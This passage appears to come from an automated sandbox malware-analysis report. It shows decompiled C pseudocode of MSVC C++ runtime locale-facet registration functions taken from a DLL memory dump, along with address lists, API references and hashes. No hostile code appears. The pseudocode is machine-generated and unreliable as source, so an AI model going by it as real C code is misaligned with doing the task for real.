																 *((intOrPtr*)( *((intOrPtr*)( *_t187 + 4))))();
																 *0x6e286dd0 = _t187;
																goto L26;
															}
														} else {
															_t187 = _t192;
															goto L26;
														}
													}
												} else {
													_t186 =  *(_t198 - 0x10);
													 *(_t198 - 0x10) = _t186;
													 *(_t198 - 4) = 1;
													E6E1C6FD3(__eflags, _t186);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4))))();
													 *0x6e286e00 = _t186;
													goto L19;
												}
											} else {
												_t186 = _t191;
												goto L19;
											}
										}
									} else {
										_t185 =  *(_t198 - 0x10);
										 *(_t198 - 0x10) = _t185;
										 *(_t198 - 4) = 1;
										E6E1C6FD3(__eflags, _t185);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 4))))();
										 *0x6e286dcc = _t185;
										goto L12;
									}
								} else {
									_t185 = _t190;
									goto L12;
								}
							}
						} else {
							_t184 =  *(_t198 - 0x10);
							 *(_t198 - 0x10) = _t184;
							 *(_t198 - 4) = 1;
							E6E1C6FD3(__eflags, _t184);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 4))))();
							 *0x6e286dfc = _t184;
							goto L5;
						}
					} else {
						_t184 = _t189;
						goto L5;
					}
				}
			}

0x6e1cfa97
0x6e1cfa97
0x6e1cfa9e
0x6e1cfaa8
0x6e1cfaad
0x6e1cfab8
0x6e1cfabc
0x6e1cfabf
0x6e1cfac4
0x6e1cfac8
0x6e1cfacd
0x6e1cfad1
0x6e1cfb16
0x6e1cfb19
0x6e1cfb25
0x6e1cfad3
0x6e1cfad5
0x6e1cfadb
0x6e1cfae1
0x6e1cfae9
0x6e1cfaec
0x6e1cfb29
0x6e1cfb37
0x6e1cfb3c
0x6e1cfb44
0x6e1cfb4e
0x6e1cfb53
0x6e1cfb5e
0x6e1cfb62
0x6e1cfb65
0x6e1cfb6a
0x6e1cfb73
0x6e1cfb75
0x6e1cfb77
0x6e1cfbbc
0x6e1cfbbf
0x6e1cfbcb
0x6e1cfb79
0x6e1cfb79
0x6e1cfb7b
0x6e1cfb81
0x6e1cfb87
0x6e1cfb8f
0x6e1cfb92
0x6e1cfbcf
0x6e1cfbdd
0x6e1cfbe2
0x6e1cfbea
0x6e1cfbf4
0x6e1cfbf9
0x6e1cfc04
0x6e1cfc08
0x6e1cfc0b
0x6e1cfc10
0x6e1cfc19
0x6e1cfc1b
0x6e1cfc1d
0x6e1cfc62
0x6e1cfc65
0x6e1cfc71
0x6e1cfc1f
0x6e1cfc1f
0x6e1cfc21
0x6e1cfc27
0x6e1cfc2d
0x6e1cfc35
0x6e1cfc38
0x6e1cfc75
0x6e1cfc83
0x6e1cfc88
0x6e1cfc90
0x6e1cfc9a
0x6e1cfc9f
0x6e1cfcaa
0x6e1cfcae
0x6e1cfcb1
0x6e1cfcb6
0x6e1cfcbf
0x6e1cfcc1
0x6e1cfcc3
0x6e1cfd08
0x6e1cfd0b
0x6e1cfd17
0x6e1cfcc5
0x6e1cfcc5
0x6e1cfcc7
0x6e1cfccd
0x6e1cfcd3
0x6e1cfcdb
0x6e1cfcde
0x6e1cfd18
0x6e1cfd1b
0x6e1cfd29
0x6e1cfd2e
0x6e1cfd36
0x6e1cfd3b
0x6e1cfd3d
0x6e1cfd43
0x6e1cfd46
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd53
0x6e1cfd59
0x6e1cfd5c
0x6e1cfd68
0x6e1cfce0
0x6e1cfce0
0x6e1cfce3
0x6e1cfce7
0x6e1cfceb
0x6e1cfcf8
0x6e1cfd00
0x6e1cfd02
0x00000000
0x6e1cfd02
0x6e1cfcc9
0x6e1cfcc9
0x00000000
0x6e1cfcc9
0x6e1cfcc7
0x6e1cfc3a
0x6e1cfc3a
0x6e1cfc3d
0x6e1cfc41
0x6e1cfc45
0x6e1cfc52
0x6e1cfc5a
0x6e1cfc5c
0x00000000
0x6e1cfc5c
0x6e1cfc23
0x6e1cfc23
0x00000000
0x6e1cfc23
0x6e1cfc21
0x6e1cfb94
0x6e1cfb94
0x6e1cfb97
0x6e1cfb9b
0x6e1cfb9f
0x6e1cfbac
0x6e1cfbb4
0x6e1cfbb6
0x00000000
0x6e1cfbb6
0x6e1cfb7d
0x6e1cfb7d
0x00000000
0x6e1cfb7d
0x6e1cfb7b
0x6e1cfaee
0x6e1cfaee
0x6e1cfaf1
0x6e1cfaf5
0x6e1cfaf9
0x6e1cfb06
0x6e1cfb0e
0x6e1cfb10
0x00000000
0x6e1cfb10
0x6e1cfad7
0x6e1cfad7
0x00000000
0x6e1cfad7
0x6e1cfad5

APIs

__EH_prolog3.LIBCMT ref: 6E1CFA9E
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFAA8
int.LIBCPMT ref: 6E1CFABF

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CFAF9
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CFB19
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CFB37

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: f57e4d897ae1638ab469b211fea7aeb0287e309dc4981500d40f097f594e4afa
Instruction ID: 91829220ffc1e08e35ba5f285afb285ddd2dc996c839ed5b6442c114aaa958a2
Opcode Fuzzy Hash: f57e4d897ae1638ab469b211fea7aeb0287e309dc4981500d40f097f594e4afa
Instruction Fuzzy Hash: 8711597591051D8FCF01DBE4C864AFEB37ABF64B04F244809E520EB290DF789985EB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CFB3D, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6E1CFB3D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;
				void* _t81;
				signed int _t131;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t154;

				_t141 = __edx;
				_t110 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t154 - 0x14, 0);
				_t147 =  *0x6e286dcc; // 0x0
				 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
				 *(_t154 - 0x10) = _t147;
				_t55 = E6E1A161C(0x6e286d80);
				_t113 =  *((intOrPtr*)(_t154 + 8));
				_t56 = E6E1A171B( *((intOrPtr*)(_t154 + 8)), _t55);
				_t143 = _t56;
				if(_t56 != 0) {
					L5:
					E6E1C66BA(_t154 - 0x14);
					return E6E1E0075(_t143);
				} else {
					if(_t147 == 0) {
						_push( *((intOrPtr*)(_t154 + 8)));
						_push(_t154 - 0x10);
						__eflags = E6E1D1558(__ebx, _t113, __edx, _t143, _t147) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t154 - 0x20);
							E6E1E3D74(_t154 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t143, _t147, 0x14);
							E6E1C6653(_t154 - 0x14, 0);
							_t148 =  *0x6e286e00; // 0x0
							 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
							 *(_t154 - 0x10) = _t148;
							_t68 = E6E1A161C(0x6e286dac);
							_t120 =  *((intOrPtr*)(_t154 + 8));
							_t144 = E6E1A171B( *((intOrPtr*)(_t154 + 8)), _t68);
							__eflags = _t144;
							if(_t144 != 0) {
								L12:
								E6E1C66BA(_t154 - 0x14);
								return E6E1E0075(_t144);
							} else {
								__eflags = _t148;
								if(_t148 == 0) {
									_push( *((intOrPtr*)(_t154 + 8)));
									_push(_t154 - 0x10);
									__eflags = E6E1D15C4(_t110, _t120, __edx, _t144, _t148) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t154 - 0x20);
										E6E1E3D74(_t154 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t110, _t144, _t148, 0x14);
										E6E1C6653(_t154 - 0x14, 0);
										_t149 =  *0x6e286dd0; // 0x0
										 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
										 *(_t154 - 0x10) = _t149;
										_t81 = E6E1A161C(0x6e286d60);
										_t127 =  *((intOrPtr*)(_t154 + 8));
										_t145 = E6E1A171B( *((intOrPtr*)(_t154 + 8)), _t81);
										__eflags = _t145;
										if(_t145 != 0) {
											L19:
											E6E1C66BA(_t154 - 0x14);
											return E6E1E0075(_t145);
										} else {
											__eflags = _t149;
											if(_t149 == 0) {
												_push( *((intOrPtr*)(_t154 + 8)));
												_push(_t154 - 0x10);
												__eflags = E6E1D162A(_t110, _t127, __edx, _t145, _t149) - 0xffffffff;
												if(__eflags == 0) {
													_t131 = _t154 - 0x20;
													E6E1A1438(_t131);
													E6E1E3D74(_t154 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e22851f, _t110, _t145, _t149, 4);
													_t150 = _t131;
													 *(_t154 - 0x10) = _t150;
													 *((intOrPtr*)(_t150 + 4)) =  *((intOrPtr*)(_t154 + 0xc));
													_push( *((intOrPtr*)(_t154 + 0x14)));
													_t49 = _t154 - 4;
													 *_t49 =  *(_t154 - 4) & 0x00000000;
													__eflags =  *_t49;
													 *_t150 = 0x6e22c0c4;
													 *((char*)(_t150 + 0x28)) =  *((intOrPtr*)(_t154 + 0x10));
													E6E1D542F(_t110, _t131, _t141, _t145, _t150,  *_t49);
													return E6E1E0075(_t150,  *((intOrPtr*)(_t154 + 8)));
												} else {
													_t145 =  *(_t154 - 0x10);
													 *(_t154 - 0x10) = _t145;
													 *(_t154 - 4) = 1;
													E6E1C6FD3(__eflags, _t145);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4))))();
													 *0x6e286dd0 = _t145;
													goto L19;
												}
											} else {
												_t145 = _t149;
												goto L19;
											}
										}
									} else {
										_t144 =  *(_t154 - 0x10);
										 *(_t154 - 0x10) = _t144;
										 *(_t154 - 4) = 1;
										E6E1C6FD3(__eflags, _t144);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 4))))();
										 *0x6e286e00 = _t144;
										goto L12;
									}
								} else {
									_t144 = _t148;
									goto L12;
								}
							}
						} else {
							_t143 =  *(_t154 - 0x10);
							 *(_t154 - 0x10) = _t143;
							 *(_t154 - 4) = 1;
							E6E1C6FD3(__eflags, _t143);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 4))))();
							 *0x6e286dcc = _t143;
							goto L5;
						}
					} else {
						_t143 = _t147;
						goto L5;
					}
				}
			}

0x6e1cfb3d
0x6e1cfb3d
0x6e1cfb44
0x6e1cfb4e
0x6e1cfb53
0x6e1cfb5e
0x6e1cfb62
0x6e1cfb65
0x6e1cfb6a
0x6e1cfb6e
0x6e1cfb73
0x6e1cfb77
0x6e1cfbbc
0x6e1cfbbf
0x6e1cfbcb
0x6e1cfb79
0x6e1cfb7b
0x6e1cfb81
0x6e1cfb87
0x6e1cfb8f
0x6e1cfb92
0x6e1cfbcf
0x6e1cfbdd
0x6e1cfbe2
0x6e1cfbea
0x6e1cfbf4
0x6e1cfbf9
0x6e1cfc04
0x6e1cfc08
0x6e1cfc0b
0x6e1cfc10
0x6e1cfc19
0x6e1cfc1b
0x6e1cfc1d
0x6e1cfc62
0x6e1cfc65
0x6e1cfc71
0x6e1cfc1f
0x6e1cfc1f
0x6e1cfc21
0x6e1cfc27
0x6e1cfc2d
0x6e1cfc35
0x6e1cfc38
0x6e1cfc75
0x6e1cfc83
0x6e1cfc88
0x6e1cfc90
0x6e1cfc9a
0x6e1cfc9f
0x6e1cfcaa
0x6e1cfcae
0x6e1cfcb1
0x6e1cfcb6
0x6e1cfcbf
0x6e1cfcc1
0x6e1cfcc3
0x6e1cfd08
0x6e1cfd0b
0x6e1cfd17
0x6e1cfcc5
0x6e1cfcc5
0x6e1cfcc7
0x6e1cfccd
0x6e1cfcd3
0x6e1cfcdb
0x6e1cfcde
0x6e1cfd18
0x6e1cfd1b
0x6e1cfd29
0x6e1cfd2e
0x6e1cfd36
0x6e1cfd3b
0x6e1cfd3d
0x6e1cfd43
0x6e1cfd46
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd53
0x6e1cfd59
0x6e1cfd5c
0x6e1cfd68
0x6e1cfce0
0x6e1cfce0
0x6e1cfce3
0x6e1cfce7
0x6e1cfceb
0x6e1cfcf8
0x6e1cfd00
0x6e1cfd02
0x00000000
0x6e1cfd02
0x6e1cfcc9
0x6e1cfcc9
0x00000000
0x6e1cfcc9
0x6e1cfcc7
0x6e1cfc3a
0x6e1cfc3a
0x6e1cfc3d
0x6e1cfc41
0x6e1cfc45
0x6e1cfc52
0x6e1cfc5a
0x6e1cfc5c
0x00000000
0x6e1cfc5c
0x6e1cfc23
0x6e1cfc23
0x00000000
0x6e1cfc23
0x6e1cfc21
0x6e1cfb94
0x6e1cfb94
0x6e1cfb97
0x6e1cfb9b
0x6e1cfb9f
0x6e1cfbac
0x6e1cfbb4
0x6e1cfbb6
0x00000000
0x6e1cfbb6
0x6e1cfb7d
0x6e1cfb7d
0x00000000
0x6e1cfb7d
0x6e1cfb7b

APIs

__EH_prolog3.LIBCMT ref: 6E1CFB44
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFB4E
int.LIBCPMT ref: 6E1CFB65

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CFB9F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CFBBF
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CFBDD

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: c42095c8bf43814da43447dd730662a2943bb1d3fa6f32aae9a7b3cbac2c7cf8
Instruction ID: e0153f20601bed145871338c3edc332bbf7e82680145aaf3d61d0579a3cefd28
Opcode Fuzzy Hash: c42095c8bf43814da43447dd730662a2943bb1d3fa6f32aae9a7b3cbac2c7cf8
Instruction Fuzzy Hash: 52113AB591051D8BCF01DBD4C864BFEB77ABF64B14F240809D520E7290DF789989E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CFBE3, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6E1CFBE3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t42;
				void* _t54;
				signed int _t93;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;

				_t79 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t110 - 0x14, 0);
				_t105 =  *0x6e286e00; // 0x0
				 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
				 *(_t110 - 0x10) = _t105;
				_t41 = E6E1A161C(0x6e286dac);
				_t82 =  *((intOrPtr*)(_t110 + 8));
				_t42 = E6E1A171B( *((intOrPtr*)(_t110 + 8)), _t41);
				_t102 = _t42;
				if(_t42 != 0) {
					L5:
					E6E1C66BA(_t110 - 0x14);
					return E6E1E0075(_t102);
				} else {
					if(_t105 == 0) {
						_push( *((intOrPtr*)(_t110 + 8)));
						_push(_t110 - 0x10);
						__eflags = E6E1D15C4(__ebx, _t82, __edx, _t102, _t105) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t110 - 0x20);
							E6E1E3D74(_t110 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t102, _t105, 0x14);
							E6E1C6653(_t110 - 0x14, 0);
							_t106 =  *0x6e286dd0; // 0x0
							 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
							 *(_t110 - 0x10) = _t106;
							_t54 = E6E1A161C(0x6e286d60);
							_t89 =  *((intOrPtr*)(_t110 + 8));
							_t103 = E6E1A171B( *((intOrPtr*)(_t110 + 8)), _t54);
							__eflags = _t103;
							if(_t103 != 0) {
								L12:
								E6E1C66BA(_t110 - 0x14);
								return E6E1E0075(_t103);
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									_push( *((intOrPtr*)(_t110 + 8)));
									_push(_t110 - 0x10);
									__eflags = E6E1D162A(__ebx, _t89, __edx, _t103, _t106) - 0xffffffff;
									if(__eflags == 0) {
										_t93 = _t110 - 0x20;
										E6E1A1438(_t93);
										E6E1E3D74(_t110 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e22851f, _t79, _t103, _t106, 4);
										_t107 = _t93;
										 *(_t110 - 0x10) = _t107;
										 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t110 + 0xc));
										_push( *((intOrPtr*)(_t110 + 0x14)));
										_t35 = _t110 - 4;
										 *_t35 =  *(_t110 - 4) & 0x00000000;
										__eflags =  *_t35;
										 *_t107 = 0x6e22c0c4;
										 *((char*)(_t107 + 0x28)) =  *((intOrPtr*)(_t110 + 0x10));
										E6E1D542F(_t79, _t93, __edx, _t103, _t107,  *_t35);
										return E6E1E0075(_t107,  *((intOrPtr*)(_t110 + 8)));
									} else {
										_t103 =  *(_t110 - 0x10);
										 *(_t110 - 0x10) = _t103;
										 *(_t110 - 4) = 1;
										E6E1C6FD3(__eflags, _t103);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 4))))();
										 *0x6e286dd0 = _t103;
										goto L12;
									}
								} else {
									_t103 = _t106;
									goto L12;
								}
							}
						} else {
							_t102 =  *(_t110 - 0x10);
							 *(_t110 - 0x10) = _t102;
							 *(_t110 - 4) = 1;
							E6E1C6FD3(__eflags, _t102);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
							 *0x6e286e00 = _t102;
							goto L5;
						}
					} else {
						_t102 = _t105;
						goto L5;
					}
				}
			}

0x6e1cfbe3
0x6e1cfbea
0x6e1cfbf4
0x6e1cfbf9
0x6e1cfc04
0x6e1cfc08
0x6e1cfc0b
0x6e1cfc10
0x6e1cfc14
0x6e1cfc19
0x6e1cfc1d
0x6e1cfc62
0x6e1cfc65
0x6e1cfc71
0x6e1cfc1f
0x6e1cfc21
0x6e1cfc27
0x6e1cfc2d
0x6e1cfc35
0x6e1cfc38
0x6e1cfc75
0x6e1cfc83
0x6e1cfc88
0x6e1cfc90
0x6e1cfc9a
0x6e1cfc9f
0x6e1cfcaa
0x6e1cfcae
0x6e1cfcb1
0x6e1cfcb6
0x6e1cfcbf
0x6e1cfcc1
0x6e1cfcc3
0x6e1cfd08
0x6e1cfd0b
0x6e1cfd17
0x6e1cfcc5
0x6e1cfcc5
0x6e1cfcc7
0x6e1cfccd
0x6e1cfcd3
0x6e1cfcdb
0x6e1cfcde
0x6e1cfd18
0x6e1cfd1b
0x6e1cfd29
0x6e1cfd2e
0x6e1cfd36
0x6e1cfd3b
0x6e1cfd3d
0x6e1cfd43
0x6e1cfd46
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd53
0x6e1cfd59
0x6e1cfd5c
0x6e1cfd68
0x6e1cfce0
0x6e1cfce0
0x6e1cfce3
0x6e1cfce7
0x6e1cfceb
0x6e1cfcf8
0x6e1cfd00
0x6e1cfd02
0x00000000
0x6e1cfd02
0x6e1cfcc9
0x6e1cfcc9
0x00000000
0x6e1cfcc9
0x6e1cfcc7
0x6e1cfc3a
0x6e1cfc3a
0x6e1cfc3d
0x6e1cfc41
0x6e1cfc45
0x6e1cfc52
0x6e1cfc5a
0x6e1cfc5c
0x00000000
0x6e1cfc5c
0x6e1cfc23
0x6e1cfc23
0x00000000
0x6e1cfc23
0x6e1cfc21

APIs

__EH_prolog3.LIBCMT ref: 6E1CFBEA
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFBF4
int.LIBCPMT ref: 6E1CFC0B

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CFC45
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CFC65
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CFC83

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 3a4ea944c3ad0dc6150481406e5a045e28f178525b5987d98dc1780c589b0e51
Instruction ID: ea8ba72e40ad753315814d1c042902e016b618bb883a27b568b52eea37567ffc
Opcode Fuzzy Hash: 3a4ea944c3ad0dc6150481406e5a045e28f178525b5987d98dc1780c589b0e51
Instruction Fuzzy Hash: 8A113A759105188BCF01DBD4C854EFDB37ABF64B14F240908D420E7290CF789984E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB898, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1DB898(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t97;
				signed int _t98;
				void* _t110;
				void* _t123;
				void* _t136;
				void* _t149;
				void* _t162;
				signed int _t245;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t286;

				_t264 = __edx;
				_t203 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t286 - 0x14, 0);
				_t273 =  *0x6e286e30; // 0x0
				 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
				 *(_t286 - 0x10) = _t273;
				_t97 = E6E1A161C(0x6e286e10);
				_t206 =  *((intOrPtr*)(_t286 + 8));
				_t98 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t97);
				_t266 = _t98;
				if(_t98 != 0) {
					L5:
					E6E1C66BA(_t286 - 0x14);
					return E6E1E0075(_t266);
				} else {
					if(_t273 == 0) {
						_push( *((intOrPtr*)(_t286 + 8)));
						_push(_t286 - 0x10);
						__eflags = E6E1DC050(__ebx, _t206, __edx, _t266, _t273) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t286 - 0x20);
							E6E1E3D74(_t286 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t266, _t273, 0x14);
							E6E1C6653(_t286 - 0x14, 0);
							_t274 =  *0x6e286e34; // 0x0
							 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
							 *(_t286 - 0x10) = _t274;
							_t110 = E6E1A161C(0x6e286e14);
							_t213 =  *((intOrPtr*)(_t286 + 8));
							_t267 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t110);
							__eflags = _t267;
							if(_t267 != 0) {
								L12:
								E6E1C66BA(_t286 - 0x14);
								return E6E1E0075(_t267);
							} else {
								__eflags = _t274;
								if(_t274 == 0) {
									_push( *((intOrPtr*)(_t286 + 8)));
									_push(_t286 - 0x10);
									__eflags = E6E1DC0B8(_t203, _t213, __edx, _t267, _t274) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t286 - 0x20);
										E6E1E3D74(_t286 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t203, _t267, _t274, 0x14);
										E6E1C6653(_t286 - 0x14, 0);
										_t275 =  *0x6e286e3c; // 0x0
										 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
										 *(_t286 - 0x10) = _t275;
										_t123 = E6E1A161C(0x6e286e1c);
										_t220 =  *((intOrPtr*)(_t286 + 8));
										_t268 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t123);
										__eflags = _t268;
										if(_t268 != 0) {
											L19:
											E6E1C66BA(_t286 - 0x14);
											return E6E1E0075(_t268);
										} else {
											__eflags = _t275;
											if(_t275 == 0) {
												_push( *((intOrPtr*)(_t286 + 8)));
												_push(_t286 - 0x10);
												__eflags = E6E1DC120(_t203, _t220, __edx, _t268, _t275) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t286 - 0x20);
													E6E1E3D74(_t286 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t203, _t268, _t275, 0x14);
													E6E1C6653(_t286 - 0x14, 0);
													_t276 =  *0x6e286e38; // 0x0
													 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
													 *(_t286 - 0x10) = _t276;
													_t136 = E6E1A161C(0x6e286e18);
													_t227 =  *((intOrPtr*)(_t286 + 8));
													_t269 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t136);
													__eflags = _t269;
													if(_t269 != 0) {
														L26:
														E6E1C66BA(_t286 - 0x14);
														return E6E1E0075(_t269);
													} else {
														__eflags = _t276;
														if(_t276 == 0) {
															_push( *((intOrPtr*)(_t286 + 8)));
															_push(_t286 - 0x10);
															__eflags = E6E1DC1A4(_t203, _t227, _t264, _t269, _t276) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t286 - 0x20);
																E6E1E3D74(_t286 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t203, _t269, _t276, 0x14);
																E6E1C6653(_t286 - 0x14, 0);
																_t277 =  *0x6e286e40; // 0x0
																 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																 *(_t286 - 0x10) = _t277;
																_t149 = E6E1A161C(0x6e286e20);
																_t234 =  *((intOrPtr*)(_t286 + 8));
																_t270 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t149);
																__eflags = _t270;
																if(_t270 != 0) {
																	L33:
																	E6E1C66BA(_t286 - 0x14);
																	return E6E1E0075(_t270);
																} else {
																	__eflags = _t277;
																	if(_t277 == 0) {
																		_push( *((intOrPtr*)(_t286 + 8)));
																		_push(_t286 - 0x10);
																		__eflags = E6E1DC229(_t203, _t234, _t264, _t270, _t277) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t286 - 0x20);
																			E6E1E3D74(_t286 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t203, _t270, _t277, 0x14);
																			E6E1C6653(_t286 - 0x14, 0);
																			_t278 =  *0x6e286e44; // 0x0
																			 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																			 *(_t286 - 0x10) = _t278;
																			_t162 = E6E1A161C(0x6e286e24);
																			_t241 =  *((intOrPtr*)(_t286 + 8));
																			_t271 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t162);
																			__eflags = _t271;
																			if(_t271 != 0) {
																				L40:
																				E6E1C66BA(_t286 - 0x14);
																				return E6E1E0075(_t271);
																			} else {
																				__eflags = _t278;
																				if(_t278 == 0) {
																					_push( *((intOrPtr*)(_t286 + 8)));
																					_push(_t286 - 0x10);
																					__eflags = E6E1DC295(_t203, _t241, _t264, _t271, _t278) - 0xffffffff;
																					if(__eflags == 0) {
																						_t245 = _t286 - 0x20;
																						E6E1A1438(_t245);
																						E6E1E3D74(_t286 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e22851f, _t203, _t271, _t278, 4);
																						_t279 = _t245;
																						 *(_t286 - 0x10) = _t279;
																						 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t286 + 0xc));
																						_push( *((intOrPtr*)(_t286 + 0x14)));
																						_t91 = _t286 - 4;
																						 *_t91 =  *(_t286 - 4) & 0x00000000;
																						__eflags =  *_t91;
